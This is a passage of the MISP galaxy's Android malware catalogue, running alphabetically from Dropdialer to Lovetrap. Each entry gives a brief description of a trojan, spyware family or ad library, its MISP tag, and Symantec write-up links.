https://www.symantec.com/security_response/writeup.jsp?docid=2014-031014-3628-99

Dropdialer

Dropdialer is a Trojan horse for Android devices that sends SMS messages to a premium-rate phone number.

The tag is: misp-galaxy:android="Dropdialer"

Table 154. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070909-0726-99

Dupvert

Dupvert is a Trojan horse for Android devices that opens a back door and steals information from the compromised device. It may also perform other malicious activities.

The tag is: misp-galaxy:android="Dupvert"

Table 155. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-072313-1959-99

Dynamicit

Dynamicit is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dynamicit"

Table 156. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-1346-99

Ecardgrabber

Ecardgrabber is an application that attempts to read details from NFC enabled credit cards. It attempts to read information from NFC enabled credit cards that are in close proximity.

The tag is: misp-galaxy:android="Ecardgrabber"

Table 157. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062215-0939-99

Ecobatry

Ecobatry is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Ecobatry"

Table 158. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080606-4102-99

Enesoluty

Enesoluty is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Enesoluty"

Table 159. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090607-0807-99

Everbadge

Everbadge is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Everbadge"

Table 160. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-3736-99

Ewalls

Ewalls is a Trojan horse for the Android operating system that steals information from the mobile device.

The tag is: misp-galaxy:android="Ewalls"

Table 161. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-073014-0854-99

Exprespam

Exprespam is a Trojan horse for Android devices that displays a fake message and steals personal information stored on the compromised device.

The tag is: misp-galaxy:android="Exprespam"

Table 162. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-010705-2324-99

Fakealbums

Fakealbums is a Trojan horse for Android devices that monitors and forwards received messages from the compromised device.

The tag is: misp-galaxy:android="Fakealbums"

Table 163. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071819-0636-99

Fakeangry

Fakeangry is a Trojan horse on the Android platform that opens a back door, downloads files, and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Fakeangry"

Table 164. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022823-4233-99

Fakeapp

Fakeapp is a Trojan horse for Android devices that downloads configuration files to display advertisements and collects information from the compromised device.

The tag is: misp-galaxy:android="Fakeapp"

Table 165. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022805-4318-99

Fakebanco

Fakebanco is a Trojan horse for Android devices that redirects users to a phishing page in order to steal their information.

The tag is: misp-galaxy:android="Fakebanco"

Table 166. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-112109-5329-99

Fakebank

Fakebank is a Trojan horse that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakebank"

Table 167. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071813-2448-99

Fakebank.B

Fakebank.B is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakebank.B"

Table 168. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-101114-5645-99

Fakebok

Fakebok is a Trojan horse for Android devices that sends SMS messages to premium phone numbers.

The tag is: misp-galaxy:android="Fakebok"

Table 169. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-021115-5153-99

Fakedaum

Fakedaum is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakedaum"

Table 170. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-061813-3630-99

Fakedefender

Fakedefender is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakedefender"

Table 171. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-060301-4418-99

Fakedefender.B

Fakedefender.B is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to purchase an app in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakedefender.B"

Table 172. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-091013-3953-99

Fakedown

Fakedown is a Trojan horse for Android devices that downloads more malicious apps onto the compromised device.

The tag is: misp-galaxy:android="Fakedown"

Table 173. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-041803-5918-99

Fakeflash

Fakeflash is a Trojan horse for Android devices that installs a fake Flash application in order to direct users to a website.

The tag is: misp-galaxy:android="Fakeflash"

Table 174. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-070318-2122-99

Fakegame

Fakegame is a Trojan horse for Android devices that displays advertisements and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakegame"

Table 175. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040808-2922-99

Fakeguard

Fakeguard is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakeguard"

Table 176. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-102908-3526-99

Fakejob

Fakejob is a Trojan horse for Android devices that redirects users to scam websites.

The tag is: misp-galaxy:android="Fakejob"

Table 177. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030721-3048-99

Fakekakao

Fakekakao is a Trojan horse for Android devices sends SMS messages to contacts stored on the compromised device.

The tag is: misp-galaxy:android="Fakekakao"

Table 178. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-071617-2031-99

Fakelemon

Fakelemon is a Trojan horse for Android devices that blocks certain SMS messages and may subscribe to services without the user’s consent.

The tag is: misp-galaxy:android="Fakelemon"

Table 179. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-120609-3608-99

Fakelicense

Fakelicense is a Trojan horse that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Fakelicense"

Table 180. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-062709-1437-99

Fakelogin

Fakelogin is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakelogin"

Table 181. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-102108-5457-99

FakeLookout

FakeLookout is a Trojan horse for Android devices that opens a back door and steals information on the compromised device.

The tag is: misp-galaxy:android="FakeLookout"

Table 182. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-101919-2128-99

FakeMart

FakeMart is a Trojan horse for Android devices that may send SMS messages to premium rate numbers. It may also block incoming messages and steal information from the compromised device.

The tag is: misp-galaxy:android="FakeMart"

Table 183. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-081217-1428-99

Fakemini

Fakemini is a Trojan horse for Android devices that disguises itself as an installation for the Opera Mini browser and sends premium-rate SMS messages to a predetermined number.

The tag is: misp-galaxy:android="Fakemini"

Table 184. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-110410-5958-99

Fakemrat

Fakemrat is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Fakemrat"

Table 185. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99

Fakeneflic

Fakeneflic is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Fakeneflic"

Table 186. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-101105-0518-99

Fakenotify

Fakenotify is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers, collects and sends information, and periodically displays Web pages. It also downloads legitimate apps onto the compromised device.

The tag is: misp-galaxy:android="Fakenotify"

Table 187. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011302-3052-99

Fakepatch

Fakepatch is a Trojan horse for Android devices that downloads more files on to the device.

The tag is: misp-galaxy:android="Fakepatch"

Table 188. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062811-2820-99

Fakeplay

Fakeplay is a Trojan horse for Android devices that steals information from the compromised device and sends it to a predetermined email address.

The tag is: misp-galaxy:android="Fakeplay"

Table 189. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-100917-3825-99

Fakescarav

Fakescarav is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to pay in order to remove non-existent malware or security risks from the device.

The tag is: misp-galaxy:android="Fakescarav"

Table 190. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-012809-1901-99

Fakesecsuit

Fakesecsuit is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fakesecsuit"

Table 191. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-060514-1301-99

Fakesucon

Fakesucon is a Trojan horse program for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Fakesucon"

Table 192. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-120915-2524-99

Faketaobao

Faketaobao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Faketaobao"

Table 193. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-062518-4057-99

Faketaobao.B

Faketaobao.B is a Trojan horse for Android devices that intercepts and and sends incoming SMS messages to a remote attacker.

The tag is: misp-galaxy:android="Faketaobao.B"

Table 194. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-012106-4013-99

Faketoken

Faketoken is a Trojan horse that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Faketoken"

Table 195. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-032211-2048-99

http://bgr.com/2017/08/18/android-malware-faketoken-steal-credit-card-info/

Fakeupdate

Fakeupdate is a Trojan horse for Android devices that downloads other applications onto the compromised device.

The tag is: misp-galaxy:android="Fakeupdate"

Table 196. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-081914-5637-99

Fakevoice

Fakevoice is a Trojan horse for Android devices that dials a premium-rate phone number.

The tag is: misp-galaxy:android="Fakevoice"

Table 197. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-040510-3249-99

Farmbaby

Farmbaby is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.

The tag is: misp-galaxy:android="Farmbaby"

Table 198. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090715-3641-99

Fauxtocopy

Fauxtocopy is a spyware application for Android devices that gathers photos from the device and sends them to a predetermined email address.

The tag is: misp-galaxy:android="Fauxtocopy"

Table 199. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111515-3940-99

Feiwo

Feiwo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Feiwo"

Table 200. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-4038-99

FindAndCall

FindAndCall is a Potentially Unwanted Application for Android devices that may leak information.

The tag is: misp-galaxy:android="FindAndCall"

Table 201. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-2906-99

Finfish

Finfish is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Finfish"

Table 202. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-083016-0032-99

Fireleaker

Fireleaker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fireleaker"

Table 203. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-5207-99

Fitikser

Fitikser is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Fitikser"

Table 204. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-093015-2830-99

Flexispy

Flexispy is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Flexispy"

Table 205. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-122006-4805-99

Fokonge

Fokonge is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Fokonge"

Table 206. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071802-0727-99

FoncySMS

FoncySMS is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers. It may also connect to an IRC server and execute any received shell commands.

The tag is: misp-galaxy:android="FoncySMS"

Table 207. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-011502-2651-99

Frogonal

Frogonal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Frogonal"

Table 208. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062205-2312-99

Ftad

Ftad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ftad"

Table 209. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040114-2020-99

Funtasy

Funtasy is a Trojan horse for Android devices that subscribes the user to premium SMS services.

The tag is: misp-galaxy:android="Funtasy"

Table 210. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-092519-5811-99

GallMe

GallMe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="GallMe"

Table 211. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1336-99

Gamex

Gamex is a Trojan horse for Android devices that downloads further threats.

The tag is: misp-galaxy:android="Gamex"

Table 212. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051015-1808-99

Gappusin

Gappusin is a Trojan horse for Android devices that downloads applications and disguises them as system updates.

The tag is: misp-galaxy:android="Gappusin"

Table 213. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022007-2013-99

Gazon

Gazon is a worm for Android devices that spreads through SMS messages.

The tag is: misp-galaxy:android="Gazon"

Table 214. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-030320-1436-99

Geinimi

Geinimi is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Geinimi"

Table 215. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-010111-5403-99

Generisk

Generisk is a generic detection for Android applications that may pose a privacy, security, or stability risk to the user or user’s Android device.

The tag is: misp-galaxy:android="Generisk"

Table 216. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-062622-1559-99

Genheur

Genheur is a generic detection for many individual but varied Trojans for Android devices for which specific definitions have not been created. A generic detection is used because it protects against many Trojans that share similar characteristics.

The tag is: misp-galaxy:android="Genheur"

Table 217. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-0848-99

Genpush

Genpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Genpush"

Table 218. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-033109-0426-99

GeoFake

GeoFake is a Trojan horse for Android devices that sends SMS messages to premium-rate numbers.

The tag is: misp-galaxy:android="GeoFake"

Table 219. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-040217-3232-99

Geplook

Geplook is a Trojan horse for Android devices that downloads additional apps onto the compromised device.

The tag is: misp-galaxy:android="Geplook"

Table 220. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121814-0917-99

Getadpush

Getadpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Getadpush"

Table 221. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-0957-99

Ggtracker

Ggtracker is a Trojan horse for Android devices that sends SMS messages to a premium-rate number. It may also steal information from the device.

The tag is: misp-galaxy:android="Ggtracker"

Table 222. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-062208-5013-99

Ghostpush

Ghostpush is a Trojan horse for Android devices that roots the compromised device. It may then perform malicious activities on the compromised device.

The tag is: misp-galaxy:android="Ghostpush"

Table 223. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-100215-3718-99

Gmaster

Gmaster is a Trojan horse on the Android platform that steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Gmaster"

Table 224. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-082404-5049-99

Godwon

Godwon is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Godwon"

Table 225. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-091017-1833-99

Golddream

Golddream is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Golddream"

Table 226. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-070608-4139-99

Goldeneagle

Goldeneagle is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Goldeneagle"

Table 227. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-090110-3712-99

Golocker

Golocker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Golocker"

Table 228. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062003-3214-99

Gomal

Gomal is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Gomal"

Table 229. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-101312-1047-99

Gonesixty

Gonesixty is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonesixty"

Table 230. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-093001-2649-99

Gonfu

Gonfu is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu"

Table 231. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-060610-3953-99

Gonfu.B

Gonfu.B is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Gonfu.B"

Table 232. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-030811-5215-99

Gonfu.C

Gonfu.C is a Trojan horse for Android devices that may download additional threats on the compromised device.

The tag is: misp-galaxy:android="Gonfu.C"

Table 233. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031817-3639-99

Gonfu.D

Gonfu.D is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Gonfu.D"

Table 234. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-040414-1158-99

Gooboot

Gooboot is a Trojan horse for Android devices that may send text messages to premium rate numbers.

The tag is: misp-galaxy:android="Gooboot"

Table 235. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031818-3034-99

Goodadpush

Goodadpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Goodadpush"

Table 236. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0913-99

Greystripe

Greystripe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Greystripe"

Table 237. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-2643-99

Gugespy

Gugespy is a spyware program for Android devices that logs the device’s activity and sends it to a predetermined email address.

The tag is: misp-galaxy:android="Gugespy"

Table 238. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071822-2515-99

Gugespy.B

Gugespy.B is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Gugespy.B"

Table 239. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-070511-5038-99

Gupno

Gupno is a Trojan horse for Android devices that poses as a legitimate app and attempts to charge users for features that are normally free. It may also display advertisements on the compromised device.

The tag is: misp-galaxy:android="Gupno"

Table 240. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-072211-5533-99

Habey

Habey is a Trojan horse for Android devices that may attempt to delete files and send SMS messages from the compromised device.

The tag is: misp-galaxy:android="Habey"

Table 241. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-100608-4512-99

Handyclient

Handyclient is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Handyclient"

Table 242. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5027-99

Hehe

Hehe is a Trojan horse for Android devices that blocks incoming calls and SMS messages from specific numbers. The Trojan also steals information from the compromised device.

The tag is: misp-galaxy:android="Hehe"

Table 243. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-012211-0020-99

Hesperbot

Hesperbot is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: misp-galaxy:android="Hesperbot"

Table 244. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121010-1120-99

Hippo

Hippo is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Hippo"

Table 245. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-071215-3547-99

Hippo.B

Hippo.B is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Hippo.B"

Table 246. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031915-0151-99

IadPush

IadPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="IadPush"

Table 247. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4104-99

iBanking

iBanking is a Trojan horse for Android devices that opens a back door on the compromised device and may steal information.

The tag is: misp-galaxy:android="iBanking"

Table 248. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030713-0559-99

Iconosis

Iconosis is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Iconosis"

Table 249. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062107-3327-99

Iconosys

Iconosys is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Iconosys"

Table 250. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081309-0341-99

Igexin

Igexin is an advertisement library that is bundled with certain Android applications. Igexin has the capability of spying on victims through otherwise benign apps by downloading malicious plugins,

The tag is: misp-galaxy:android="Igexin"

Igexin is also known as:

  • IcicleGum

Igexin has relationships with:

  • similar: misp-galaxy:android="IcicleGum" with estimative-language:likelihood-probability="likely"

Table 251. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-032606-5519-99

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

https://blog.lookout.com/igexin-malicious-sdk

ImAdPush

ImAdPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ImAdPush"

Table 252. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040323-0218-99

InMobi

InMobi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="InMobi"

Table 253. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-1527-99

Jifake

Jifake is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Jifake"

Table 254. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-073021-4247-99

Jollyserv

Jollyserv is a Trojan horse for Android devices that sends SMS messages and steals information from the compromised device.

The tag is: misp-galaxy:android="Jollyserv"

Table 255. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-090311-4533-99

Jsmshider

Jsmshider is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Jsmshider"

Table 256. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-062114-0857-99

Ju6

Ju6 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Ju6"

Table 257. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2428-99

Jumptap

Jumptap is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jumptap"

Table 258. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0859-99

Jzmob

Jzmob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Jzmob"

Table 259. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-1703-99

Kabstamper

Kabstamper is a Trojan horse for Android devices that corrupts images found on the compromised device.

The tag is: misp-galaxy:android="Kabstamper"

Table 260. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-060706-2305-99

Kidlogger

Kidlogger is a Spyware application for Android devices that logs the device’s activity and sends it to a predetermined website.

The tag is: misp-galaxy:android="Kidlogger"

Table 261. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-122014-1927-99

Kielog

Kielog is a Trojan horse for Android devices that logs keystrokes and sends the stolen information to the remote attacker.

The tag is: misp-galaxy:android="Kielog"

Table 262. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040205-4035-99

Kituri

Kituri is a Trojan horse for Android devices that blocks certain SMS messages from being received by the device. It may also send SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Kituri"

Table 263. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-061111-5350-99

Kranxpay

Kranxpay is a Trojan horse for Android devices that downloads other apps onto the device.

The tag is: misp-galaxy:android="Kranxpay"

Table 264. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071009-0809-99

Krysanec

Krysanec is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Krysanec"

Table 265. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-090113-4128-99

Kuaidian360

Kuaidian360 is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Kuaidian360"

Table 266. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040109-2415-99

Kuguo

Kuguo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Kuguo"

Table 267. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-5215-99

Lastacloud

Lastacloud is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Lastacloud"

Table 268. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121216-4334-99

Laucassspy

Laucassspy is a spyware program for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Laucassspy"

Table 269. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-092409-1822-99

Lifemonspy

Lifemonspy is a spyware application for Android devices that can track the phone’s location, download SMS messages, and erase certain data from the device.

The tag is: misp-galaxy:android="Lifemonspy"

Table 270. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111516-5540-99

Lightdd

Lightdd is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Lightdd"

Table 271. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-053114-2342-99

Loaderpush

Loaderpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Loaderpush"

Table 272. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040108-0244-99

Locaspy

Locaspy is a Potentially Unwanted Application for Android devices that tracks the location of the compromised device.

The tag is: misp-galaxy:android="Locaspy"

Table 273. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030720-3500-99

Lockdroid.E

Lockdroid.E is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.E"

Table 274. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-103005-2209-99

Lockdroid.F

Lockdroid.F is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.F"

Table 275. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-102215-4346-99

Lockdroid.G

Lockdroid.G is a Trojan horse for Android devices that may display a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.G"

Table 276. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-050610-2450-99

Lockdroid.H

Lockdroid.H is a Trojan horse for Android devices that locks the screen and displays a ransom demand on the compromised device.

The tag is: misp-galaxy:android="Lockdroid.H"

Table 277. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2016-031621-1349-99

Lockscreen

Lockscreen is a Trojan horse for Android devices that locks the compromised device from use.

The tag is: misp-galaxy:android="Lockscreen"

Table 278. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-032409-0743-99

LogiaAd

LogiaAd is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="LogiaAd"

Table 279. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052713-0348-99

Loicdos

Loicdos is an Android application that provides an interface to a website in order to perform a denial of service (DoS) attack against a computer.

The tag is: misp-galaxy:android="Loicdos"

Table 280. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-022002-2431-99

Loozfon

Loozfon is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Loozfon"

Table 281. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-082005-5451-99

Lotoor

Lotoor is a generic detection for hack tools that exploit vulnerabilities in order to gain root privileges on compromised Android devices.

The tag is: misp-galaxy:android="Lotoor"

Table 282. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091922-4449-99

Lovespy

Lovespy is a Trojan horse for Android devices that steals information from the device.

The tag is: misp-galaxy:android="Lovespy"

Table 283. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-071814-3805-99

Lovetrap

Lovetrap is a Trojan horse that sends SMS messages to premium-rate phone numbers.

The tag is: misp-galaxy:android="Lovetrap"

Table 284. Table References

